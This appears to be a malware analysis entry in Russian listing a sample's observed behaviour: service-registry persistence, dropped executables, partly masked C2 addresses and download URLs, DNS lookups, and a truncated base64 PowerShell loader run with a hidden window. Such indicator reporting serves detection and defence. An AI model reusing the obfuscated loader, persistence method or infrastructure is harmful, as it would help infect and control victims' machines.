Техническая информация
- [<HKLM>\System\CurrentControlSet\Services\vcamp120] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\vcamp120] 'ImagePath' = '"%WINDIR%\SysWOW64\apds\vcamp120.exe"'
- 'vcamp120' "%WINDIR%\SysWOW64\apds\vcamp120.exe"
- 'vcamp120' %WINDIR%\SysWOW64\apds\vcamp120.exe
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABRADQAdQBoAGYANABxAD0AKAAnAFIAMwAnACsAJwB1AHAAJwArACgAJwBiAHUAJwArACcAYwAnACkAKQA7ACYAKAAnAG4AZQB3AC0AaQAnACsAJwB0AGUAJwArACcAbQAnACkAIAAkAGUAbgB2ADoAdABlAG0AUABcAFcAbwBSAGQAXAAyADAAMQA5AF...
- %TEMP%\word\2019\d3v93m.exe
- %WINDIR%\syswow64\apds\vcamp120.exe
- %TEMP%\word\2019\d3v93m.exe в %WINDIR%\syswow64\apds\vcamp120.exe
- '10#.#.122.110':80
- '19#.#01.86.6':443
- '45.##.219.163':443
- http://ch###onghui.cn/wp-content/Z/
- http://45.##.219.163:443/i58n/ via 45.##.219.163
- DNS ASK th#####tumsphere.com
- DNS ASK tm####nsulting.com
- DNS ASK is##ap.com
- DNS ASK ch###onghui.cn
- '%TEMP%\word\2019\d3v93m.exe'
- '%WINDIR%\syswow64\apds\vcamp120.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABRADQAdQBoAGYANABxAD0AKAAnAFIAMwAnACsAJwB1AHAAJwArACgAJwBiAHUAJwArACcAYwAnACkAKQA7ACYAKAAnAG4AZQB3AC0AaQAnACsAJwB0AGUAJwArACcAbQAnACkAIAAkAGUAbgB2ADoAdABlAG0AUABcAFcAbwBSAGQAXAAyADAAMQA5AF...' (со скрытым окном)